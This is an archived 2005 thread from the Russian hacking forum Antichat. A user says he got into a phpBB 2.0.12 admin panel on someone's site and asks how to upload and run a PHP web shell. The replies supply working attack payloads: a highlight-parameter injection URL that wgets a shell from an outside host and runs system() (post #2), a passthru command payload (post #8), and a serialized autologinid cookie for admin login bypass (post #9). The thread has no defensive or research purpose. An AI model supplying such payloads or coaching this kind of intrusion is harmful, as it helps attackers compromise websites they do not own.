ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

O5 25: phpBB, админка, шелл
  #1  
Старый 09.10.2005, 21:38
Аватар для Buddy
Buddy
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256

Репутация: 0
Question O5 25: phpBB, админка, шелл

Есть сайт -> на нём phpBB 2.0.12 -> смог проникнуть в админку и залить пхп-шелл как аватары, но они соответственно с расширениями .gif или .jpg и их нельзя запустить.

Как можно воспользоваться этими "аватарами", или как залить на сайт шелл с расширением .php, чтобы его можно было запустить?

Слышал, что можно через восстановление БД, но не знаю какой запрос и как именно писать.

Весь день лазил по рунету, но так ничего и не нашёл, кроме того, что это можно сделать.

ПОМОГИТЕ! ПОКАЖИТЕ ИЛИ ДАЙТЕ ССЫЛКИ!
 
Ответить с цитированием

  #2  
Старый 09.10.2005, 21:42
Аватар для Buddy
Buddy
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256

Репутация: 0
По умолчанию

На вашем сайте видел такой способ:
http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
Но он не работает.

Последний раз редактировалось Buddy; 09.10.2005 в 21:44..
 
Ответить с цитированием

  #3  
Старый 09.10.2005, 21:58
Аватар для africanec
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567

Репутация: -12
Отправить сообщение для africanec с помощью ICQ
По умолчанию

там же можно изменить разрешшения файлов загружаемых в админке
 
Ответить с цитированием

  #4  
Старый 09.10.2005, 22:09
Аватар для Buddy
Buddy
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256

Репутация: 0
По умолчанию

Как менять расширения файлов через админку я не знаю, т.к. на том форуме нет никаких дополнительных модов вроде downloads! Голый непропатченый форум.
 
Ответить с цитированием

  #5  
Старый 09.10.2005, 22:24
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Нельзя там через файлы загрузить шелл.

Цитата:
http://target/phpbb2/viewtopic.php?xxx=wget%20http://shell/shell.php&p=123&highlight=%2527.system($_GET[xxx]).include%2527
Понимаешь, эти строки выложены (мной кажется) для того чтобы те кто их использует ПОНИМАЛИ что они делают. Если просто вбить ее в браузер, заменив там адрес сайта то работать это будет в 10% случаев. Ты сначала пойми что это за баг а потом попробуй сам догадаться почему ничего не работает.

Цитата:
O5 25
Чтобы небыло опять двацпять надо смотреть видео и читать сорцы и статьи про phpBB
 
Ответить с цитированием

  #6  
Старый 09.10.2005, 23:07
Аватар для Buddy
Buddy
Новичок
Регистрация: 09.10.2005
Сообщений: 4
Провел на форуме:
5256

Репутация: 0
По умолчанию

2 KEZ

В той строке я понимаю, что мы в файл пытаемся включить наш же собственный запрос, но эта дырка уже не работает в версии 2.0.12.

Я же говорю, весь день сегодня читал/смотрел, но так ничего и не нашёл. Наверное просто не знаю что именно искать. Поэтому и прошу помощи.

Мне кажется, в данной ситуации нужно пытаться через восстановление БД, но я не знаю какой именно запрос и в какой части базы писать, т.к. практически не знаю MySQL. Подскажите плиз. Или дайте линки, где читать.
 
Ответить с цитированием

  #7  
Старый 09.10.2005, 23:12
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Ну руками это будет сделать непросто, попробуй сплойтик... Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
 
Ответить с цитированием

  #8  
Старый 09.10.2005, 23:56
Аватар для madnet
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719

Репутация: 1384


Отправить сообщение для madnet с помощью ICQ
По умолчанию

А разве highlight='.passthru($HTTP_GET_VARS[cmd]).' не работает на 12 версии?
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #9  
Старый 10.10.2005, 22:51
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Цитата:
Есть там один для дырки в autologinid переменной в кукисах... Видео смотри оно есть
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сплоит для заливки шелла в phpbb <= 2.0.12 Dro Форумы 0 28.03.2005 18:02
Можно ли получить php шелл из админки phpbb 2.0.1x? [TSH]Corpse Форумы 6 07.03.2005 04:03
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ